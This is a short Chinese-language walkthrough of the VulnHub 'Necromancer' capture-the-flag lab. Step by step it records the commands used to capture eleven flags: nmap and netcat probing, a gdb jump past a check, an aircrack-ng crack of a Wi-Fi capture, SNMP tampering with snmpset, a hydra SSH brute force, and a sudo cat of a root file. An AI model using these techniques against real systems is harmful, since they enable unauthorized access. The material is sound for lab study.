vulnhub Necromancer wp
flag1
nmap -sU -T4 192.168.220.130
有666端口
nc -nvu 192.168.220.130 666
监听回显消息
tcpdump host 192.168.220.130
抓包查看发现有到4444端口的流量
nc -nvlp 4444
监听发现字符串,解码后得到flag1
flag2
根据flag1的解码字符串提示,在监听666端口时输入opensesame,得到flag2
flag3
访问80端口,下载图片binwalk查看,是个压缩包,dd或者直接改后缀名解压缩,得到flag3
flag4
谷歌搜索提示magic items wiki将网站内容制作为字典爆破目录(连不上google失败),得到tailsman文件
cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v
修改权限为777,执行没有结果
debug
gdb ./tailsman
info functions
break wearTalisman #穿衣服时打断点
run
jump chantToBreakSpell #跳到断点,得到flag4
flag5
flag4为md5,解密为blackmagic,根据flag监听31337
nc -nvu 192.168.220.130 31337
输入blackmagic得到flag5
flag6
flag5提示/thenecromancerwillabsorbyoursoul/
访问得到flag6
flag7
thenecromancerwillabsorbyoursoul界面的图片链接点击后下载得到压缩包,解压后为pcap,协议为802.11,所以是无线网络
aircrack-ng破解
aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt
得到key death2all
snmp-check -c death2all -v 1 -t 1 192.168.220.130 #查看到flag7
snmpwalk -v 2c -c death2allrw 192.168.220.130 #查看OID
snmpset -c death2allrw -v 1 192.168.220.130 iso.3.6.1.2.1.1.6.0 s Unlocked #根据OID解锁
snmp-check -c death2all -v 1 192.168.220.130
flag8、9、10
flag7的md5为demonslayer,且显示22端口,尝试爆破密码
hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 192.168.220.130 ssh
得到密码12345678,ssh连接有个flag8文件
根据提示监听777端口
nc -u localhost 777
,敲击回车两次,之后根据谷歌得到的答案回答得到flag8、9、10
flag11
ctrk+c返回,ls -al查看有.smallvile文件,打开没有线索
sudo -l查看有/bin/cat 和/root/flag11.txt
执行sudo /bin/cat /root/flag11.txt
,结束